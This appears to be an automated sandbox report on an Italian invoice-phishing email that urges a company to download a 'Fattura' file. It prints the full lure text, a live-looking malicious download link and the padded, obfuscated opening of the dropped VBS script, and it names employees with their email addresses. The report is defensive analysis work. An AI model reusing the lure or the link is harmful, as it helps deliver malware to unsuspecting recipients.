                          Preview:L..................F.@.. ...$+.,...... ..9......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.IrY.M....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VrY.M....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.VrY.M....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.VrY.M...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VrY.M.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........n..F.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 18 08:44:43 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2681
                          Entropy (8bit):3.9853918178028818
                          Encrypted:false
                          SSDEEP:
                          MD5:4D7463D0302D82AB702AC46619BD8625
                          SHA1:D3BD7B50A653665B1EB4861342FAAC85F7A4A96E
                          SHA-256:92910EA9D86102A0EF63333176A60CBCE80D58F848483B141DB3B37B936B9C8C
                          SHA-512:6A1916CA431ED443D385845F825BFD3382B0DECA133E29010E518DC5E64147E4E55747A7586056A9A7417FF445999B5CB5A9E50F7A1301DE1F650743A7BCF705
                          Malicious:false
                          Reputation:unknown
                          Preview:L..................F.@.. ...$+.,.....i.~.9......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.IrY.M....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VrY.M....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.VrY.M....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.VrY.M...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VrY.M.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........n..F.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                          C:\Users\user\Documents\Outlook Files\Outlook Data File - NoEmail.pst

                          Download File
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                          File Type:Microsoft Outlook email folder (>=2003)
                          Category:dropped
                          Size (bytes):271360
                          Entropy (8bit):1.4055881355660447
                          Encrypted:false
                          SSDEEP:
                          MD5:6DF7D894F919B182B896176F20BD1C79
                          SHA1:6EF4AAE61441D8C7B46BCD9D081E784CCF2012C9
                          SHA-256:407AB6C3F16E3503C5ABDEFB2D8F9C62BD687A3D2CCDC883ACE66CF6F83F4457
                          SHA-512:05D45EFCB8E83769A05EF316FFE8D1899AD95C17D79FB5478EC256971781A74FD0AB99BDC9D61B7ED6B2968F74985DADEEF80C20AB08A1FCD91BFE28D13E4CE7
                          Malicious:true
                          Reputation:unknown
                          Preview:!BDN5.dSM......\.......................[................@...........@...@...................................@...........................................................................$.......D.......;..........................................................................................................................................................................................................................................................................................................................@.........Q.-.".....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp

                          Download File
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):131072
                          Entropy (8bit):1.6962222964943536
                          Encrypted:false
                          SSDEEP:
                          MD5:7091A489C4EEEE4EC393F5C05EDE4C2F
                          SHA1:275B40CBD1CE3880C49812C28EC8E038D0500354
                          SHA-256:35972F3D994C080EF7A13E93CC9DECA05DABBD741BAA0BFB56477415ED4BA4E9
                          SHA-512:226FEAF861390D78FD26F4A204E57487A9B802355E357A96C034B42FC2E6E0A182FD401FA49B3E78EF9677C8D3D7B02D6EF0E9381472889F9D55C1F59C8613C7
                          Malicious:true
                          Reputation:unknown
                          Preview:./.DC...8...........DT.z.9....................#.!BDN5.dSM......\.......................[................@...........@...@...................................@...........................................................................$.......D.......;..........................................................................................................................................................................................................................................................................................................................@.........Q.-.".DT.z.9.......B............#.........................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\Downloads\Fattura87157159.vbs (copy)

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (3231)
                          Category:dropped
                          Size (bytes):0
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:
                          MD5:5B3D8E72617B8D9E9C70445DF2253632
                          SHA1:3EB1DB8E07FD3E170567F0CC24CC689478B507E3
                          SHA-256:E23DFB82B3409AE5AF9B5D0581E7B7BEA7487E2ABA48559267770F73049F50CC
                          SHA-512:0368B6C77336C46172D0CCFF08C4EED51F0D6D3D9A583E17BD3ADFF51C8DE034701B2F7A891BF54F0D2617977172619089E4E4A2C45C1A1A55EF4BC247556236
                          Malicious:false
                          Reputation:unknown
                          Preview:WScript.Sleep(14000).' seisin schlump uncontrollably pussyfoot portly percoid politburos chloramines withstand climbers presidential overanalytical redefect unpeoples shaking.' continences outpitied pinups caesarean placenta mumbles stinking uncanonical accruing travelers playwritings romances parabola husk rape purtiest resonants internode uterus undemonstrative portal joust drinkings antiwar hants navigation perhapses nailbrushes slummiest sparlings tenements bacca batched flaying inelegance bespeaking calloused bracero coprosperities cembalos ricer reneging nickering accusal varnished controversies diolefin widdles rabic pietism parceling rebated princocks glaire bloviate malapropists polydactylies retouched mincer remonstrations.' contenting desmosomal misdriven inaccuracies photoelectronic monoxides varied centimorgans importunities plaistering sanctifies demoralizing farfel oddment xyloid obliterated theosophies unmasculine.' contenting desmosomal misdriven inaccuracies photoelec

                          C:\Users\user\Downloads\Unconfirmed 20063.crdownload

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (3231)
                          Category:dropped
                          Size (bytes):72534
                          Entropy (8bit):4.645176136248325
                          Encrypted:false
                          SSDEEP:
                          MD5:5B3D8E72617B8D9E9C70445DF2253632
                          SHA1:3EB1DB8E07FD3E170567F0CC24CC689478B507E3
                          SHA-256:E23DFB82B3409AE5AF9B5D0581E7B7BEA7487E2ABA48559267770F73049F50CC
                          SHA-512:0368B6C77336C46172D0CCFF08C4EED51F0D6D3D9A583E17BD3ADFF51C8DE034701B2F7A891BF54F0D2617977172619089E4E4A2C45C1A1A55EF4BC247556236
                          Malicious:false
                          Reputation:unknown
                          Preview:WScript.Sleep(14000).' seisin schlump uncontrollably pussyfoot portly percoid politburos chloramines withstand climbers presidential overanalytical redefect unpeoples shaking.' continences outpitied pinups caesarean placenta mumbles stinking uncanonical accruing travelers playwritings romances parabola husk rape purtiest resonants internode uterus undemonstrative portal joust drinkings antiwar hants navigation perhapses nailbrushes slummiest sparlings tenements bacca batched flaying inelegance bespeaking calloused bracero coprosperities cembalos ricer reneging nickering accusal varnished controversies diolefin widdles rabic pietism parceling rebated princocks glaire bloviate malapropists polydactylies retouched mincer remonstrations.' contenting desmosomal misdriven inaccuracies photoelectronic monoxides varied centimorgans importunities plaistering sanctifies demoralizing farfel oddment xyloid obliterated theosophies unmasculine.' contenting desmosomal misdriven inaccuracies photoelec

                          C:\Users\user\Downloads\e3a38eb8-d4be-4790-b0f8-6f1478ec66cd.tmp

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (2658)
                          Category:dropped
                          Size (bytes):16059
                          Entropy (8bit):4.920610774712818
                          Encrypted:false
                          SSDEEP:
                          MD5:B19F8EA252CE589AA5E90C66883E077B
                          SHA1:DBEA9AA7523DA335E32D44AFB98D55DACF2E691B
                          SHA-256:59FC39DEA4CB43BAFC5E43C5666BACBF2C0F369697CCB88BF61B529501780121
                          SHA-512:E0F06218E9750271A893967D36BE9FBF77553A8DD4E1C716959F503FC9C1897E428EEA7B0834D7D53E12A345EA1DB61590591A2EECDCCC115E48CD13DEF10A4F
                          Malicious:false
                          Reputation:unknown
                          Preview:WScript.Sleep(14000).' seisin schlump uncontrollably pussyfoot portly percoid politburos chloramines withstand climbers presidential overanalytical redefect unpeoples shaking.' continences outpitied pinups caesarean placenta mumbles stinking uncanonical accruing travelers playwritings romances parabola husk rape purtiest resonants internode uterus undemonstrative portal joust drinkings antiwar hants navigation perhapses nailbrushes slummiest sparlings tenements bacca batched flaying inelegance bespeaking calloused bracero coprosperities cembalos ricer reneging nickering accusal varnished controversies diolefin widdles rabic pietism parceling rebated princocks glaire bloviate malapropists polydactylies retouched mincer remonstrations.' contenting desmosomal misdriven inaccuracies photoelectronic monoxides varied centimorgans importunities plaistering sanctifies demoralizing farfel oddment xyloid obliterated theosophies unmasculine.' contenting desmosomal misdriven inaccuracies photoelec

                          Static File Info

                          General

                          File type:CDFV2 Microsoft Outlook Message
                          Entropy (8bit):3.5650909496067116
                          TrID:
                          • Outlook Message (71009/1) 58.92%
                          • Outlook Form Template (41509/1) 34.44%
                          • Generic OLE2 / Multistream Compound File (8008/1) 6.64%
                          File name:I_ Ultima richiesta di pagamento finale per Cuzziol beverage s_r_l__.msg
                          File size:42'496 bytes
                          MD5:cb84c33545673307198ca7dc864e8e5f
                          SHA1:f9cbb6e67738eb8235d03d7df218aeea6e510ec9
                          SHA256:396e4d924a45d551c2c8bcfd147112bbe3128885e22e1e7a593006117759132b
                          SHA512:9ca1087e13dc31fe6f4c9dba6491e591c19d0e20abb76d326721449be1e61b83efadba87c04b350306279522e3933b03a5378ca967926964726ddb5833cd8b8b
                          SSDEEP:768:2h4JoM4xXS6fzH6HCoeN1gXPRv/p3CcjyVMAYsO:UHiGH6HCoFDyVMU
                          TLSH:97137B1536E58B0AF2BBDF364DE281878532BCD1ED21C78F3291734F1572981A961B2B
                          File Content Preview:........................>......................................................................................................................................................................................................................................

                          Static Mail

                          General

                          Subject:I: Ultima richiesta di pagamento finale per Cuzziol beverage s.r.l..
                          From:Franco Bin <franco.bin@cuzziol.it>
                          To:Andrea Ceccherini <andrea.ceccherini@cuzziol.it>
                          Cc:
                          BCC:
                          Date:Mon, 18 Nov 2024 10:41:46 +0100
                          Communications:
                          • SPAM ? Da: gianluca.mucciolo80@pec.it <gianluca.mucciolo80@pec.it> Inviato: luned 18 novembre 2024 02:10 A: Cuzziol beverage s.r.l. <cuzziolbeveragesrl@pec.it> Oggetto: Ultima richiesta di pagamento finale per Cuzziol beverage s.r.l.. Buongiorno, Cuzziol beverage s.r.l. Con sede in Santa lucia di piave(tv) Via Maiorana 1 05050740264 Con la presente comunicazione, intendo attirare la Sua attenzione sul fatto che in virt del contratto stipulato il 10/05/2024, Lei ha assunto l'impegno di corrispondermi l'importo di euro 562,13. A tutt'oggi, non ho ancora ricevuto il pagamento nonostante i molteplici solleciti gi inviati. La avviso che, se non provveder al pagamento spontaneamente entro cinque giorni dalla ricezione della presente, sar costretto/a ad affidare la pratica al mio avvocato per l'avvio delle procedure legali di recupero del credito, senza inviare ulteriori avvisi o solleciti. Si precisa che questa comunicazione costituisce una formale messa in mora e interrompe la prescrizione. E' possibile scaricare la fattura tramite il link sottostante: Fattura <https://amdwind5xptsm0uvj0ijbsfshyuy0n4vze97vbh.livecasinotipuk.com/EPsAIgNy0L> Cordiali saluti,
                          Attachments:

                            Headers

                            Key Value
                            Receivedfrom EXCH01.cuzziol.local ([fe80::e0c5:cd68:87d8:c955]) by
                            Transport; Mon, 18 Nov 2024 1041:47 +0100
                            2024 1041:46 +0100
                            EXCH01.cuzziol.local ([fe80:e0c5:cd68:87d8:c955%7]) with mapi id
                            15.01.2242.012; Mon, 18 Nov 2024 1041:46 +0100
                            Content-Typeapplication/ms-tnef; name="winmail.dat"
                            Content-Transfer-Encodingbinary
                            FromFranco Bin <franco.bin@cuzziol.it>
                            ToAndrea Ceccherini <andrea.ceccherini@cuzziol.it>
                            SubjectI: Ultima richiesta di pagamento finale per Cuzziol beverage s.r.l..
                            Thread-TopicUltima richiesta di pagamento finale per Cuzziol beverage
                            Thread-IndexAQGYR3TgiJ9LkyNCcqwiXi+C6afMGrNCrTEA
                            DateMon, 18 Nov 2024 10:41:46 +0100
                            Message-ID<be33c0faf4c74e5680ffaaff56322dd0@cuzziol.it>
                            References<opec210312.20241118031011.95256.594.1.52@pec.aruba.it>
                            In-Reply-To<opec210312.20241118031011.95256.594.1.52@pec.aruba.it>
                            Accept-Languageit-IT, en-US
                            Content-Languageit-IT
                            X-MS-Has-AttachX-MS-Exchange-Organization-SCL: -1
                            X-MS-TNEF-Correlator<be33c0faf4c74e5680ffaaff56322dd0@cuzziol.it>
                            MIME-Version1.0
                            X-MS-Exchange-Organization-MessageDirectionalityOriginating
                            X-MS-Exchange-Organization-AuthSourceEXCH01.cuzziol.local
                            X-MS-Exchange-Organization-AuthAsInternal
                            X-MS-Exchange-Organization-AuthMechanism04
                            X-Originating-IP[192.168.1.58]
                            X-MS-Exchange-Organization-Network-Message-Id9c6cb000-d48c-43f0-293a-08dd07b53826
                            Return-Pathfranco.bin@cuzziol.it
                            X-MS-Exchange-Organization-AVStamp-Enterprise1.0
                            X-MS-Exchange-Transport-EndToEndLatency00:00:00.3300552
                            X-MS-Exchange-Processed-By-BccFoldering15.01.2242.012
                            dateMon, 18 Nov 2024 10:41:46 +0100

                            File Icon

                            Icon Hash:c4e1928eacb280a2